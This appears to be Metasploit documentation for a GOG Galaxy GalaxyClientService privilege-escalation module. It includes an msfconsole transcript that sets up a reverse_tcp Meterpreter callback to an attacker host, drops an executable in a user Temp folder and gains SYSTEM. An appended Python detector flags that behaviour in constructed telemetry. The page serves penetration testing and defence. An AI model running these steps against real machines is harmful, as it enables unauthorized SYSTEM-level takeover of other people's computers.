
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/local/gog_galaxyclientservice_privesc.md

Vulnerable Application

GOG Galaxy is a video game management client. One of its Windows services, GalaxyClientService, runs with SYSTEM privileges. In versions 2.0.12 and earlier, and 1.2.64 and earlier, it is possible to communicate with the service and instruct it to execute arbitrary commands as SYSTEM.

A vulnerable version need only be installed on the target machine in order to be exploitable.

Verification Steps

  1. Start msfconsole.

  2. Acquire a Meterpreter session.

  3. Do: use exploit/windows/local/gog_galaxyclientservice_privesc

  4. Do: set SESSION <session_no>

  5. Do: exploit

  6. Verify that you get a Meterpreter session.

Options

WORKING_DIR

The initial working directory of the command.

Scenarios

GOG Galaxy Client v1.2.66.64 on Windows 10

```
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.131:50855) at 2020-06-15 08:35:15 -0500
meterpreter > getuid
Server username: DESKTOP-AQT4EG1\space
meterpreter > sysinfo
Computer        : DESKTOP-AQT4EG1
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 15
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/gog_galaxyclientservice_privesc
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set session 1
session => 1
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > check
[*] The target appears to be vulnerable. Vulnerable version found: 1.2.66.64
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Starting GalaxyClientService...
[*] Service started successfully.
[*] Connecting to service...
[*] Writing C:\Users\space\AppData\Local\Temp\mqslPXvWyu.exe to target
[*] Connected to service. Sending payload...
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.131:50857) at 2020-06-15 08:35:59 -0500
[+] Command executed successfully!
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-AQT4EG1
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 15
Meterpreter     : x64/windows
```
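The transcript above gives a defender three observable steps: the service is started, an executable is written into a user's local Temp directory, and that executable then runs as SYSTEM under the service. The following is an added detection example, not part of the Metasploit module or the GOG Galaxy software. It correlates constructed key=value telemetry (the layout is an assumption, as is the on-disk name GalaxyClientService.exe for the service binary, which the page never states) and flags a process spawned by the service whose image lives under a per-user Temp path, noting whether the service was started shortly beforehand.

```python
import re
from datetime import datetime, timedelta

# Assumption: the service's binary name; only the service name GalaxyClientService
# appears on the page. Compared case-insensitively against the parent image basename.
SERVICE_IMAGE = "galaxyclientservice.exe"
SERVICE_NAME = "GalaxyClientService"

# Per-user Temp directory: the location the module wrote its payload to in the scenario.
USER_TEMP = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\", re.IGNORECASE)

# The module starts the service before talking to it, so a service start within this
# window ahead of the spawn strengthens the signal.
CORRELATION_WINDOW = timedelta(minutes=5)

# Constructed sample telemetry in a flat key=value layout (not real Windows event text).
# Events 1 and 2 mirror the timeline of the scenario; 3 and 4 are benign controls;
# 5 is the same spawn shape without a preceding service start.
SAMPLE_EVENTS = [
    "time=2020-06-15T08:35:40 id=7036 service=GalaxyClientService state=running",
    r"time=2020-06-15T08:35:41 id=1 user=NT AUTHORITY\SYSTEM "
    r"parent=C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe "
    r"image=C:\Users\space\AppData\Local\Temp\mqslPXvWyu.exe",
    r"time=2020-06-15T09:10:02 id=1 user=NT AUTHORITY\SYSTEM "
    r"parent=C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe "
    r"image=C:\Program Files (x86)\GOG Galaxy\GalaxyClient.exe",
    r"time=2020-06-15T09:12:30 id=1 user=DESKTOP-AQT4EG1\space "
    r"parent=C:\Windows\explorer.exe "
    r"image=C:\Users\space\AppData\Local\Temp\setup.exe",
    r"time=2020-06-15T14:00:00 id=1 user=NT AUTHORITY\SYSTEM "
    r"parent=C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe "
    r"image=C:\Users\space\AppData\Local\Temp\update.exe",
]

# key=value pairs whose values may contain spaces and backslashes; a value ends
# where the next " key=" begins or at end of line.
FIELD = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line):
    """Split one telemetry line into a dict and parse its timestamp."""
    ev = dict(FIELD.findall(line))
    ev["time"] = datetime.fromisoformat(ev["time"])
    return ev


def find_suspicious_spawns(lines):
    """Return process-create events where GalaxyClientService spawned an image
    from a per-user Temp directory, annotated with the service-start correlation."""
    events = [parse_event(line) for line in lines]
    service_starts = [
        ev["time"] for ev in events
        if ev.get("id") == "7036"
        and ev.get("service") == SERVICE_NAME
        and ev.get("state") == "running"
    ]

    hits = []
    for ev in events:
        if ev.get("id") != "1":
            continue
        parent_name = ev.get("parent", "").rsplit("\\", 1)[-1].lower()
        if parent_name != SERVICE_IMAGE:
            continue
        image = ev.get("image", "")
        if not USER_TEMP.match(image):
            continue
        recently_started = any(
            timedelta(0) <= ev["time"] - start <= CORRELATION_WINDOW
            for start in service_starts
        )
        hits.append({
            "time": ev["time"].isoformat(),
            "user": ev.get("user"),
            "image": image,
            "service_recently_started": recently_started,
        })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_spawns(SAMPLE_EVENTS):
        print(hit)
```

The parent/child relationship carries the rule; the Temp-path filter keeps the service's own legitimate children (the GalaxyClient.exe control event) out of the results, and the service-start correlation is reported as a field rather than required, so a spawn without a preceding start is still surfaced but with less confidence.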